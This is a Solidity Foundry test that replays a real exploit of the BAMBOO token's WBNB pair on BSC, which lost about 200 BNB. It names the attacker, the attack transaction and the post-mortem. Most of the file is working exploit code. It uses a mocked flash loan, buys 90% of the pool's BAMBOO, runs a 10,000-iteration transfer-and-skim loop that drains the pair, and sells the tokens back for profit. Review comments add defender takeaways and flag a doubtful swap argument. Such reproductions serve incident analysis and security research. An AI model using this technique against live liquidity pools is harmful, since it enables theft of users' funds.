Bamboo_exp.sol
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
// @KeyInfo - Total Lost : ~200BNB
// Attacker : 0x00703face6621bd207d3b4ac9867058190c0bb09
// Attack Contract : 0xcdf0eb202cfd1f502f3fdca9006a4b5729aadebc
// Vulnerable Contract : 0xed56784bc8f2c036f6b0d8e04cb83c253e4a6a94
// Attack Tx : https://explorer.phalcon.xyz/tx/bsc/0x88a6c2c3ce86d4e0b1356861b749175884293f4302dbfdbfb16a5e373ab58a10
// Block: 29668034
// @Info
// Vulnerable Contract Code : https://bscscan.com/address/0xed56784bc8f2c036f6b0d8e04cb83c253e4a6a94
// @Analysis
// Post-mortem : https://twitter.com/Phalcon_xyz/status/1676220090142916611
// @POC Author : https://twitter.com/eugenioclrc
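/// @title BambooTest
/// @notice Foundry fork test that replays the BAMBOO/WBNB incident referenced in the
///         file header against BSC state at block 29_668_034.
/// @dev Reproduction only: it needs a "bsc" RPC endpoint configured for Foundry and the
///      project's ./interface.sol. All addresses are BSC mainnet contracts.
contract BambooTest is Test {
    IERC20 wbnb = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
    // The token listed as "Vulnerable Contract" in the file header.
    IERC20 bamboo = IERC20(0xED56784bC8F2C036f6b0D8E04Cb83C253e4a6A94);
    IPancakePair wbnbBambooPair = IPancakePair(0x0557713d02A15a69Dea5DD4116047e50F521C1b1);
    IPancakeRouter router = IPancakeRouter(payable(0x10ED43C718714eb63d5aA57B78B54704E256024E));
    // Not referenced anywhere else in this contract.
    IUniswapV2Factory factory = IUniswapV2Factory(0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73);
    // Foundry cheatcode address; forge-std's `vm` points at the same address, so
    // `cheats` and `vm` are interchangeable below.
    CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);

    /// @notice Forks BSC at the block given in the header and labels the main
    ///         contracts so traces are readable.
    function setUp() public {
        cheats.createSelectFork("bsc", 29_668_034);
        vm.label(address(wbnb), "WBNB");
        vm.label(address(bamboo), "BAMBOO");
        vm.label(address(router), "PancakeRouter");
    }

    /// @notice Formats a wei amount as a decimal string with 18 fractional digits.
    /// @dev The fractional part is left-padded with zeros. Without the padding,
    ///      1.05 ether would print as "1.50000000000000000" and read as 1.5,
    ///      which misreports the balances and the loss figure in the logs.
    ///      string.concat needs solc >= 0.8.12 even though the pragma admits 0.8.10.
    /// @param _wei Amount in wei.
    /// @return The amount as "<whole>.<18-digit fraction>".
    function toEth(uint256 _wei) internal returns (string memory) {
        string memory whole = vm.toString(_wei / 1 ether);
        string memory frac = vm.toString(_wei % 1 ether);
        while (bytes(frac).length < 18) {
            frac = string.concat("0", frac);
        }
        return string.concat(whole, ".", frac);
    }

    /// @notice Replays the incident: buy BAMBOO, run the transfer/skim loop against
    ///         the pair, sell the BAMBOO back and log the WBNB difference.
    /// @dev NOTE(review): on a standard ERC-20 a transfer-to-pair followed by skim()
    ///      is a round trip with no net effect. Presumably BAMBOO's transfer logic
    ///      changes the pair's balance as a side effect; confirm against the verified
    ///      token source and the post-mortem linked in the header.
    ///      Defender takeaway, if that holds: token logic must not alter an AMM pair's
    ///      balance outside swap/mint/burn, and a burst of transfer+skim calls against
    ///      one pair inside a single transaction is a useful monitoring signal.
    function testExploit() public {
        // deal() sets this contract's WBNB balance directly, standing in for a flash
        // loan. Nothing is repaid on-chain; the 4000 WBNB is subtracted in the last log.
        deal(address(wbnb), address(this), 4000 ether);
        console.log("start balance after flashloan", toEth(wbnb.balanceOf(address(this))));

        uint256 bambooBalance = bamboo.balanceOf(address(wbnbBambooPair));

        address[] memory path;
        path = new address[](2);
        path[0] = address(wbnb);
        path[1] = address(bamboo);

        // Quote for buying 90% of the pair's BAMBOO balance.
        uint256[] memory amounts = router.getAmountsIn(bambooBalance * 9 / 10, path);
        wbnb.approve(address(router), type(uint256).max);
        // NOTE(review): getAmountsIn returns the quoted input in amounts[0] and the
        // requested output in amounts[1]; the value passed as amountIn here is
        // amounts[1]. Kept as in the original PoC; confirm this is intended.
        router.swapExactTokensForTokens(amounts[1], 0, path, address(this), block.timestamp);

        // Iteration count and transfer amount are taken from the original PoC;
        // their derivation is not shown in this file.
        uint256 max = 10_000;
        for (uint256 i; i < max; ++i) {
            bamboo.transfer(address(wbnbBambooPair), 1_343_870_967_101_818_317);
            wbnbBambooPair.skim(address(this));
        }

        // Sell all BAMBOO back for WBNB through the fee-on-transfer-aware router path.
        path[0] = address(bamboo);
        path[1] = address(wbnb);
        bamboo.approve(address(router), type(uint256).max);
        router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
            bamboo.balanceOf(address(this)), 0, path, address(this), block.timestamp
        );

        // Checked arithmetic (solc 0.8): this reverts if the final balance is below
        // the 4000 WBNB mock loan, so an unprofitable run fails the test.
        console.log("profit after return flashloan", toEth(wbnb.balanceOf(address(this)) - 4000 ether));
    }
}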